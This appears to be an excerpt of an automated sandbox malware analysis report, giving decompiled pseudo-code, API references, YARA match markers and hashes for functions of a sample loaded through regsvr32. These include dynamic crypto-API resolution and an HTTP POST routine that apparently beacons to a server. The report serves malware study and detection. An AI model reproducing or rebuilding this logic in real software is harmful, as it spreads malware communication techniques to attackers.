            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 027B2998
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 027B29A6
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 027B29B5
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: 88a6554b9aa226d7c883b304414a66027a1de8fc819363667ac01546ba4f8c58
            • Instruction ID: cf88cfcb2cb676826d6c20be9502739b1384f01c3b1386f6adc43dd4533b5f0d
            • Opcode Fuzzy Hash: 88a6554b9aa226d7c883b304414a66027a1de8fc819363667ac01546ba4f8c58
            • Instruction Fuzzy Hash: 8E11A572E4131AF7EB239AB88C45FDEB7AD9F44654F110160EF05F2140DB70EA019A54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AF823 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E027AF823(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t170;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_v56 = E027A9F75(0xab3);
				_v52 = E027A9F75(0x3f9);
				_v48 = E027A9F75(0x40f);
				_t93 = E027A9F75(0x1eb);
				_t170 = 0x58;
				_v44 = _t93;
				_t94 = E027A9F75(_t170);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E027A8F0A( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E027AA5DA(_t190));
				_t102 =  *0x27bf900; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x27bf900; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x27bf9e8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E027AF7BB(_t189);
							_t110 =  *0x27bf900; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E027AA202(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x27bf900; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E027AA202(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E027AF769(_t116);
									}
									_t117 = E027A9F75(0xfb0);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x27bf900; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E027AA5DA(_t193), _a4, _a8);
									E027A8D2E( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E027AA202(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E027A8F0A( &_v20, 0, _t122);
										_t127 =  *0x27bf900; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E027AA10C( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x27bf900; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x27bf900; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x27bf900; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x27bf900; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x27bf900; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x27bf900; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x27bf900; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x27bf900; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x27bf900; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}































































            0x027af831
            0x027af83d
            0x027af844
            0x027af851
            0x027af854
            0x027af865
            0x027af87c
            0x027af889
            0x027af896
            0x027af899
            0x027af8a0
            0x027af8a1
            0x027af8a4
            0x027af8a9
            0x027af8ae
            0x027af8b0
            0x027af8b8
            0x027af8c0
            0x027af8c7
            0x027af8d3
            0x027af8d6
            0x027af8e4
            0x027af8e7
            0x027af8ed
            0x027af8ee
            0x027af8f0
            0x027af8f9
            0x027af8fa
            0x027af8ff
            0x027af905
            0x027af90f
            0x027af90f
            0x027af911
            0x027af916
            0x027af920
            0x027af92b
            0x027af934
            0x027af936
            0x027af938
            0x027af947
            0x027af95e
            0x027af964
            0x027af967
            0x027af96b
            0x027af96d
            0x027af972
            0x027af972
            0x027af977
            0x027af979
            0x027af98f
            0x027af993
            0x027af998
            0x027af99a
            0x027af99a
            0x027af9ae
            0x027af9b9
            0x027af9bc
            0x027af9bf
            0x027af9c2
            0x027af9c7
            0x027af9cc
            0x027af9cc
            0x027af9cf
            0x027af9d1
            0x027af9f7
            0x027af9fb
            0x027af9ff
            0x027af9ff
            0x027afa09
            0x027afa11
            0x027afa16
            0x027afa21
            0x027afa27
            0x027afa31
            0x027afa34
            0x027afa39
            0x027afa3d
            0x027afa42
            0x027afa42
            0x027afa47
            0x027afa4b
            0x027afa96
            0x027afa98
            0x027afa9b
            0x027afaa3
            0x027afaa7
            0x027afaaa
            0x027afabc
            0x027afac7
            0x027afac9
            0x027afadd
            0x027afae2
            0x027afae7
            0x027afb1c
            0x027afb21
            0x027afb26
            0x027afb28
            0x00000000
            0x027afb28
            0x027afaeb
            0x027afaee
            0x027afaee
            0x027afaf4
            0x027afaf7
            0x027afafa
            0x027afafa
            0x027afafc
            0x027afafe
            0x027afb04
            0x027afb04
            0x027afb07
            0x027afb09
            0x027afb0b
            0x027afb12
            0x027afb12
            0x00000000
            0x027afb15
            0x027afacb
            0x027afad1
            0x00000000
            0x027afa4d
            0x027afa4d
            0x027afa53
            0x027afa59
            0x027afa5c
            0x027afa61
            0x027afa66
            0x027afa69
            0x027afa6e
            0x027afa6e
            0x027afa71
            0x027afa74
            0x00000000
            0x027afa74
            0x027af9d3
            0x027af9d3
            0x027af9d9
            0x027af9df
            0x027af9e2
            0x027af9e7
            0x027af9ea
            0x027af9ed
            0x027af9ef
            0x00000000
            0x027af9ef
            0x027af97b
            0x027af97b
            0x027af981
            0x027af987
            0x027afa77
            0x027afa77
            0x027afa77
            0x00000000
            0x027afa77
            0x027af979
            0x027af93a
            0x027afa79
            0x027afa7c
            0x027afa7e
            0x027afa81
            0x027afa84
            0x027afa84
            0x027afa8d
            0x027afa8f
            0x00000000
            0x00000000
            0x027afa93
            0x00000000
            0x027afa93
            0x027af909
            0x00000000

            APIs
            • memset.MSVCRT ref: 027AF854
            • memset.MSVCRT ref: 027AF865
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 027AF93A
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: fd5df43bb0d973ec57faf45bfc4586f035f6ac0b50a9d22b53f63fc0460c48ea
            • Instruction ID: 314a3bb0fce9d72a9f9b1880630b7e6871113b5f43a4ecd442a644c6efb7d52e
            • Opcode Fuzzy Hash: fd5df43bb0d973ec57faf45bfc4586f035f6ac0b50a9d22b53f63fc0460c48ea
            • Instruction Fuzzy Hash: C1A13975900218AFDB12DFA8D898FAEB7B9FF88320F14456AF905E7250DB349A40CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B14E2 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: ec8ee26e0bcfbc7e7cea6310f245d54c3f337311b43613b56d8c3e29c39f30a7
            • Instruction ID: 13222f7d3246135a74c0503340c66747983a35c0b1ddd7de4bb77611da902126
            • Opcode Fuzzy Hash: ec8ee26e0bcfbc7e7cea6310f245d54c3f337311b43613b56d8c3e29c39f30a7
            • Instruction Fuzzy Hash: 8EE16BB190020AAFEF139EA4CC56FEF3B69EF45344F948025FD19A6141E731DA618FA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A4FE8 Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E027A4FE8(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x27bf8e4; // 0x47ffc00
					_t96 =  *0x27bf8e8; // 0x47ffab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0x110)))));
				}
				if(E027ACB96(_t156) != 0) {
					L4:
					_t47 = E027AC86B();
					_push(_t99);
					_v588 = _t47;
					E027AC65E(_t47,  &_v580, _t173, _t175);
					_t100 = E027A4FA4( &_v580,  &_v580, _t173);
					_t112 = E027AE3C8( &_v580, E027AA5DA( &_v580), 0);
					E027AC881(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E027A311B(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x27bc9d8);
						_t55 = E027A9BF7(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E027A9A5A(_v596);
							_t116 = _t101;
							 *0x27bf9a0 = _t56;
							 *0x27bf998 = E027A9A5A(_t116);
							L12:
							_push(_t116);
							_t157 = E027AA7D0( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x27bca26);
							_t146 = 0xe;
							E027AAC40(_t146, _t175);
							E027AAC79(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E027AAC1B(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E027AB1C2(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E027AB1C2(_t149, _t175);
							}
							_t65 = E027AA202(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E027AABED();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x27bf8e4; // 0x47ffc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E027B0DFC(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x27bf8e4; // 0x47ffc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E027AF1DB(_t152);
									}
									E027A5603( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x27bf8e4; // 0x47ffc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E027A109A(_t128, 0x1c7);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E027A8D41( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x47ffe28
								_t127 = _t32;
								L20:
								_t67 = E027A5878(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x27bf8e4; // 0x47ffc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E027AD224(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x27bf8e0; // 0x47ff8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x27bf8e0; // 0x47ff8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E027A8D86( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E027A8D86( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E027A3034( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































            0x027a4fe8
            0x027a4ff5
            0x027a5000
            0x027a5005
            0x027a5007
            0x027a500a
            0x027a500f
            0x027a5012
            0x027a501c
            0x027a501e
            0x027a502b
            0x027a5034
            0x027a5034
            0x027a5041
            0x027a505c
            0x027a505e
            0x027a5063
            0x027a5068
            0x027a506e
            0x027a507d
            0x027a509c
            0x027a509e
            0x027a50a3
            0x027a50aa
            0x027a50af
            0x027a50b6
            0x027a50c0
            0x027a50c2
            0x027a50c3
            0x027a50c9
            0x027a50ce
            0x027a50d1
            0x027a50d3
            0x027a50d8
            0x027a513f
            0x027a5144
            0x027a5146
            0x027a5150
            0x027a5155
            0x027a5155
            0x027a516f
            0x027a5171
            0x027a5174
            0x027a5176
            0x00000000
            0x00000000
            0x027a517c
            0x027a5183
            0x027a5186
            0x027a518f
            0x027a5194
            0x027a519a
            0x027a519f
            0x027a51a4
            0x027a51a8
            0x027a51aa
            0x027a51ae
            0x027a51ae
            0x027a51b3
            0x027a51b6
            0x027a51b8
            0x027a51bc
            0x027a51bc
            0x027a51c3
            0x027a51c8
            0x027a51cc
            0x027a51cf
            0x027a51d4
            0x027a51da
            0x027a51db
            0x027a5203
            0x027a5209
            0x027a5210
            0x027a521f
            0x027a5224
            0x00000000
            0x027a5224
            0x027a5212
            0x00000000
            0x027a51dd
            0x027a51dd
            0x027a51e2
            0x027a51e9
            0x027a522e
            0x027a522e
            0x027a5235
            0x027a5239
            0x027a523a
            0x027a523a
            0x027a5244
            0x027a5249
            0x027a524c
            0x027a524d
            0x027a524f
            0x027a5251
            0x027a5256
            0x027a525d
            0x027a52a0
            0x027a525f
            0x027a5264
            0x027a526c
            0x027a5270
            0x027a527b
            0x027a5286
            0x027a528e
            0x027a5292
            0x027a529a
            0x027a529a
            0x027a525d
            0x027a52a6
            0x027a52a9
            0x027a52ab
            0x027a52b1
            0x027a52b1
            0x027a52b3
            0x027a52b3
            0x00000000
            0x027a52b3
            0x027a51eb
            0x027a51eb
            0x027a51f1
            0x027a51f3
            0x027a51f8
            0x027a51f8
            0x027a51fa
            0x027a5229
            0x00000000
            0x027a5229
            0x027a51fc
            0x027a50ba
            0x027a50ba
            0x00000000
            0x027a50ba
            0x027a51db
            0x027a50de
            0x027a50ec
            0x027a50ff
            0x027a5104
            0x027a510a
            0x027a510c
            0x027a5124
            0x027a5129
            0x027a5132
            0x027a5138
            0x00000000
            0x027a5138
            0x027a5114
            0x027a511d
            0x00000000
            0x027a511d
            0x027a50b8
            0x00000000
            0x027a5043
            0x027a504e
            0x027a5054
            0x027a5056
            0x027a52b5
            0x027a52b5
            0x027a52b7
            0x027a52bd
            0x027a52bd
            0x00000000
            0x027a5056

            APIs
            • memset.MSVCRT ref: 027A500A
            • lstrcpyW.KERNEL32 ref: 027A5270
            • lstrcatW.KERNEL32(00000000,?), ref: 027A528E
            • lstrcatW.KERNEL32(00000000,00000000), ref: 027A5292
            • lstrcatW.KERNEL32(00000000,027BCA28), ref: 027A529A
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: e9579eaa2719a18fd51a3c9f738f55dec72a203d90fe1614095f8f974c7e9c76
            • Instruction ID: d0931c0f0c9f9df434609eedbe12680d07b8cab0cd02d925c53e1fdcc3f518cc
            • Opcode Fuzzy Hash: e9579eaa2719a18fd51a3c9f738f55dec72a203d90fe1614095f8f974c7e9c76
            • Instruction Fuzzy Hash: 6171C071B44301ABD716EB24D869F7B73EAAFC4730F144A2EF5159B2C0DB7498048B92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D510500 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 69%
            			E6D510500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6d55ce08; // 0x70cfd039
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6D511DB8(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E6D508B95(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E6D5104E0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E6D50CD05(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E6D5104E0(_t101);
									goto L36;
								}
								_t62 = E6D50CD05(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E6D5104E0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E6D50B438(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E6D513490();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E6D50CD05(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6D50B438(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6D513490();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























            0x6d510505
            0x6d510506
            0x6d510507
            0x6d51050e
            0x6d510512
            0x6d510513
            0x6d510519
            0x6d51051f
            0x6d510525
            0x6d510528
            0x6d510528
            0x6d51052b
            0x6d51052d
            0x6d51052d
            0x6d51052b
            0x6d51052f
            0x6d510534
            0x6d51053b
            0x6d51053e
            0x6d51053e
            0x6d51055a
            0x6d510560
            0x6d510565
            0x6d5106f8
            0x6d51070b
            0x6d51056b
            0x6d51056b
            0x6d51056e
            0x6d510573
            0x6d510577
            0x6d5105cb
            0x6d5105cb
            0x6d5105cd
            0x6d5105cf
            0x6d5106ed
            0x6d5106ed
            0x6d5106ef
            0x6d5106f0
            0x00000000
            0x6d5106f6
            0x6d5105e0
            0x6d5105e6
            0x6d5105e8
            0x00000000
            0x00000000
            0x6d5105ee
            0x6d510600
            0x6d510605
            0x6d510609
            0x00000000
            0x00000000
            0x6d510616
            0x6d510650
            0x6d510653
            0x6d510656
            0x6d510658
            0x6d51065a
            0x6d51065c
            0x6d5106a8
            0x6d5106a8
            0x6d5106aa
            0x6d5106aa
            0x6d5106ac
            0x6d5106e6
            0x6d5106e7
            0x00000000
            0x6d5106ec
            0x6d5106c0
            0x6d5106c5
            0x6d5106c7
            0x00000000
            0x00000000
            0x6d5106cb
            0x6d5106cc
            0x6d5106cd
            0x6d5106d0
            0x6d51070c
            0x6d51070f
            0x6d5106d2
            0x6d5106d2
            0x6d5106d3
            0x6d5106d3
            0x6d5106e0
            0x6d5106e2
            0x6d5106e4
            0x6d510715
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d5106e4
            0x6d51065e
            0x6d510661
            0x6d510663
            0x6d510665
            0x6d510667
            0x6d51066a
            0x6d51066f
            0x6d51068a
            0x6d51068c
            0x6d510696
            0x6d510698
            0x6d510699
            0x6d51069b
            0x00000000
            0x00000000
            0x6d51069d
            0x6d5106a3
            0x6d5106a3
            0x00000000
            0x6d5106a3
            0x6d510671
            0x6d510673
            0x6d510677
            0x6d51067c
            0x6d51067e
            0x6d510680
            0x00000000
            0x00000000
            0x6d510682
            0x00000000
            0x6d510682
            0x6d510618
            0x6d51061d
            0x00000000
            0x00000000
            0x6d510623
            0x6d510625
            0x00000000
            0x00000000
            0x6d51063c
            0x6d510641
            0x6d510645
            0x00000000
            0x00000000
            0x00000000
            0x6d51064b
            0x6d51057e
            0x6d510580
            0x6d510582
            0x6d51058a
            0x6d5105a9
            0x6d5105ab
            0x6d5105b5
            0x6d5105b7
            0x6d5105b8
            0x6d5105ba
            0x00000000
            0x00000000
            0x6d5105c0
            0x6d5105c6
